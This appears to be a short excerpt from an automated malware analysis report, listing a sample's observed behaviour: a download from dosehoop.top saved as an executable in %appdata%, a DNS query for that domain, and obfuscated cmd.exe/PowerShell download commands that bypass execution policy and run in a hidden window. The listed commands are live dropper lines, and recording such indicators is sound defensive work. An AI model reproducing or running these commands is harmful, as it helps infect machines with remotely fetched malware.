Technical Information
- http://dosehoop.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^E^rS^h^El^l.^Exe -^ex^EC^U^tio^n^P^o^l^ICY ByPASs ^-NopROF^IlE^ ^-wiNDo^W^s^T^yLe ^H^i^ddE^N (^N^EW-Ob^j^Ect^ SY^s^TE^m^.^N^Et.W^EB^cLient).DO^wnl^O^ADfIle('http://dose...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "POW^E^rS^h^El^l.^Exe -^ex^EC^U^tio^n^P^o^l^ICY ByPASs ^-NopROF^IlE^ ^-wiNDo^W^s^T^yLe ^H^i^ddE^N (^N^EW-Ob^j^Ect^ SY^s^TE^m^.^N^Et.W^EB^cLient).DO^wnl^O^ADfIle('http://dose...' (with hidden window)